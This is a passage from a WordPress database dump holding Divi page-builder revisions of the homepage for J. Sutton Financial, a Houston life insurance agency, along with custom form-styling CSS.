_module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" dropdown_menu_line_color=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" dropdown_menu_active_link_color=\"#003372\" custom_css_before=\"a:hover {color:#003372;}\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"80%\" custom_margin=\"|37px||||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||183px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"168px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"12px|||||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:25:00','2023-04-02 17:25:00','',138,'http://cmdev-site1.com/?p=567',0,'revision','',0),(569,1,'2023-04-02 17:30:25','2023-04-02 17:30:25','a:hover {color: #003372;}\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-04-02 17:30:25','2023-04-02 17:30:25','',35,'http://cmdev-site1.com/?p=569',0,'revision','',0),(582,1,'2023-04-02 17:54:56','2023-04-02 17:54:56','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"||66px|||\" min_height=\"24.8px\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:54:56','2023-04-02 17:54:56','',138,'http://cmdev-site1.com/?p=582',0,'revision','',0),(570,1,'2023-04-02 17:41:18','2023-04-02 17:41:18','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" dropdown_menu_line_color=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" dropdown_menu_active_link_color=\"#003372\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" header_text_align=\"center\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" hover_enabled=\"0\" global_colors_info=\"{}\" text_orientation=\"center\" sticky_enabled=\"0\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" 